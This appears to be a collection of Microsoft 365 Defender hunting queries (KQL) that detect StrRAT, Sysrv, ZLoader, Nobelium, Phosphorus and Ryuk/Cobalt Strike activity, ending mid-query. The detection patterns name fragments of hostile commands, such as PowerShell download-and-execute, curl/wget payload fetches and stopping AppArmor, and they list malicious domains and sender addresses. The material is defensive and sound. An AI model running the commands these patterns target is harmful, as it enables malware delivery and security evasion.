The following query looks for instances of defense evasion behavior, whereby the malware attempts to discover the antivirus products installed on the compromised device.
```
DeviceProcessEvents
| where InitiatingProcessFileName in~("java.exe", "javaw.exe") and InitiatingProcessCommandLine has "roaming"
| where FileName == 'cmd.exe' and ProcessCommandLine has 'path antivirusproduct get displayname'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/StrRAT malware/StrRAT-Email-Delivery.md
================================================
# StrRAT Malware Email Delivery
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and takes remote control of infected systems. It also has a module to download additional payloads onto the infected machine based on C2 server commands. Additionally, this threat has a ransomware encryption/decryption module which appends the .crimson extension.
## Query
The following query looks for emails containing domains known to be associated with delivering StrRAT malware.
```
EmailUrlInfo
| where UrlDomain has_any ('metroscaffingltg.co.uk',
'pg-finacesolutions.co.uk',
'jpfletcherconsultancy.co.uk',
'buildersworlinc.co.uk',
'bentlyconstbuild.co.uk',
'alfredoscafeltd.co.uk',
'zincocorporation.co.uk',
'playerscircleinc.co.uk',
'tg-cranedinc.co.uk',
'adamridley.co.uk',
'westcoasttrustedtaxis.co.uk',
'sivospremiumclub.co.uk',
'gossyexperience.co.uk',
'jeffersonsandc.co.uk',
'fillinaresortsltd.co.uk',
'tk-consultancyltd.co.uk')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/StrRAT malware/StrRAT-Malware-Persistence.md
================================================
# StrRAT Malware Persistence
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and takes remote control of infected systems. It also has a module to download additional payloads onto the infected machine based on C2 server commands. Additionally, this threat has a ransomware encryption/decryption module which appends the .crimson extension.
## Query
The following query looks for the scheduled task named "Skype," which is created by the StrRAT JAR file. This creates persistence on the impacted machine.
```
DeviceProcessEvents
| where InitiatingProcessFileName in~("java.exe","javaw.exe")
| where FileName == 'cmd.exe' and ProcessCommandLine has_all("schtasks /create", "tn Skype")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Sysrv-botnet/app-armor-stopped.md
================================================
# AppArmor service stopped
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of the attacker attempting to stop the AppArmor network security service on devices running Linux.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has "/bin/bash /tmp/" and ProcessCommandLine has "service apparmor stop"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | v |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/java-executing-cmd-to-run-powershell.md
================================================
# Java process executing command line to download and execute PowerShell script
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of the Java process being used to execute cmd.exe, and download and execute a PowerShell script.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == 'java.exe' and FileName == 'cmd.exe'
and ProcessCommandLine has_all('powershell iex','DownloadString')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/kinsing-miner-download.md
================================================
# Kinsing miner download
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances where the attacker commanded the Kinsing miner file to be downloaded on Linux devices.
## Query
```kusto
DeviceProcessEvents
| where ProcessCommandLine has_all('curl', '-o /etc/kinsing')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | v |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/oracle-webLogic-executing-powershell.md
================================================
# Oracle WebLogic process wlsvcX64.exe exploitation and execution of PowerShell script to download payloads
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of Oracle WebLogic being exploited to run a PowerShell script that downloads payloads.
## Query
```kusto
union DeviceProcessEvents, DeviceFileEvents
| where InitiatingProcessParentFileName =~ 'wlsvcX64.exe' and InitiatingProcessFileName =~ 'powershell.exe'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/rce-on-vulnerable-server.md
================================================
# Remote code execution on vulnerable server
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of remote code execution on a vulnerable Linux server.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has "php-cgi.exe"
| where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | v |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/tomcat-8-executing-powershell.md
================================================
# Tomcat 8 process executing PowerShell command line to perform data exploitation activities and set up scheduled tasks
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of Apache Tomcat 8 being exploited to execute encoded PowerShell commands.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith 'tomcat'
| where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc '
and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Threat actor Phosphorus masquerading as conference organizers.md
================================================
# Threat actor Phosphorus masquerading as conference organizers
Identify prior activity from this campaign using IOCs shared by Microsoft’s Threat Intelligence Center, or MSTIC.
Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/
## Query
```
//All emails from the threat actor Phosphorus, masquerading as conference organizers, based on the IOCs shared
// by Microsoft’s Threat Intelligence Center in: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",
"munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders)
```
```
//Filter for emails that were delivered; check FinalEmailAction to see whether a policy was applied to the email
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",
"munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered"
```
```
//Filter for emails that were delivered and check whether any action was taken on them post delivery, by joining with EmailPostDeliveryEvents
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",
"munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered"
| join EmailPostDeliveryEvents on NetworkMessageId, RecipientEmailAddress
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Tali Ash
**GitHub alias:** tali-ash
**Organization:** Microsoft
**Contact info:** @Taliash1
================================================
FILE: Campaigns/WastedLocker Downloader.md
================================================
# WastedLocker Downloader
This query identifies the launch pattern associated with WastedLocker ransomware.
Reference writeup: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
## Query
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'wscript.exe' and FileName =~ 'powershell.exe' and InitiatingProcessCommandLine matches regex @"(?i)\\chrome\.update\..+?\.js"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Michael Melone
**GitHub alias:** mjmelone
**Organization:** Microsoft
**Contact info:** @PowershellPoet
================================================
FILE: Campaigns/ZLoader/Malicious bat file.md
================================================
# Malicious .bat file in suspicious Oracle Java SE folder path
ZLoader was delivered in a campaign in late summer 2021. This campaign was tweeted about by @MsftSecIntel on Twitter.
## Query
This query looks for the suspicious .bat file placed in the folder using a specific naming convention purporting to be Java-related.
```
DeviceFileEvents
| where FileName endswith '.bat'
and FolderPath has @'Program Files (x86)\Sun Technology Network\Oracle Java SE'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/ZLoader/Payload Delivery.md
================================================
# Tim.exe payload delivery
ZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweeted about by @MsftSecIntel on Twitter.
## Query
This query looks for delivery of the malicious payload, Tim.exe.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ 'powershell.exe'
and InitiatingProcessCommandLine has('Invoke-WebRequest') and InitiatingProcessCommandLine endswith '-OutFile tim.EXE'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/ZLoader/Suspicious Registry Keys.md
================================================
# Suspicious Registry Keys
ZLoader was delivered in a campaign in late summer 2021 using malvertising to download malicious .msi files onto affected machines. This campaign was originally tweeted by @MsftSecIntel on Twitter.
In this campaign, the malicious .msi files create registry values that contain the attacker-created company names used to sign or package the installers.
## Query
This query looks for registry values whose data is one of the attacker-created company names.
```
DeviceRegistryEvents
| where RegistryValueData in('Flyintellect Inc.', 'Datalyst ou')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/apt sofacy zebrocy.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine endswith "cmd.exe /c SYSTEMINFO & TASKLIST"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt sofacy.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dat",'
or ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dll",#1'
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt ta17 293a ps.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine =~ "ps.exe -accepteula"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt tropictrooper.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt unidentified nov 18.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine endswith "cyzfc.dat, PointFunctionCall"
| top 100 by Timestamp desc
// Second query (run separately): the LNK file from the same campaign
DeviceFileEvents
| where Timestamp > ago(7d)
| where FolderPath has "ds7002.lnk"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/c2-lookup-from-nonbrowser[Nobelium].md
================================================
# Locate Nobelium implant receiving DNS response
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceEvents
| where ActionType == "DnsQueryResponse" //DNS Query Response
and AdditionalFields has ".avsvmcloud"
// Second query (run separately): the same lookups as recorded by Microsoft Defender for Identity
IdentityQueryEvents
| where ActionType == "DNS query"
| where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com"
| project Timestamp, QueryTarget, DeviceName ,IPAddress,ReportId
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/c2-lookup-response[Nobelium].md
================================================
# Locate Nobelium implant receiving DNS response
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceEvents
| where ActionType == "DnsQueryResponse" //DNS Query Response
and AdditionalFields has ".avsvmcloud"
// Second query (run separately): the same lookups as recorded by Microsoft Defender for Identity
IdentityQueryEvents
| where ActionType == "DNS query"
| where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com"
| project Timestamp, QueryTarget, DeviceName, IPAddress, ReportId
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/cobalt-strike-invoked-w-wmi.md
================================================
# Detect Cobalt Strike invoked via WMI
This query was originally published in the threat analytics report, *Ryuk ransomware*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/).
[Ryuk](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ryuk&threatId=-2147232689) is human-operated ransomware. Much like [DoppelPaymer](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) ransomware, Ryuk is spread manually, often on networks that are already infected with Trickbot.
During the earliest stages of a Ryuk infection, an operator downloads [Cobalt Strike](https://www.cobaltstrike.com/), a penetration testing kit that is also used by malicious actors. Cobalt Strike is used by Ryuk operators to explore the network before deploying the Ryuk payload. This malicious behavior is often obscured by Base64 encoding and other tricks.
The following query detects possible invocation of Cobalt Strike using [Windows Management Instrumentation](https://docs.microsoft.com/windows/win32/wmisdk/wmi-start-page) (WMI).
The [See also](#see-also) section below lists links to other queries associated with Ryuk ransomware.
## Query
```Kusto
// Find use of Base64 encoded PowerShell
// Indicating possible Cobalt Strike
DeviceProcessEvents
| where Timestamp > ago(7d)
// Only WMI-initiated instances, remove to broaden scope
| where InitiatingProcessFileName =~ 'wmiprvse.exe'
| where FileName =~ 'powershell.exe'
and (ProcessCommandLine hasprefix '-e' or
ProcessCommandLine contains 'frombase64')
// Check for Base64 with regex
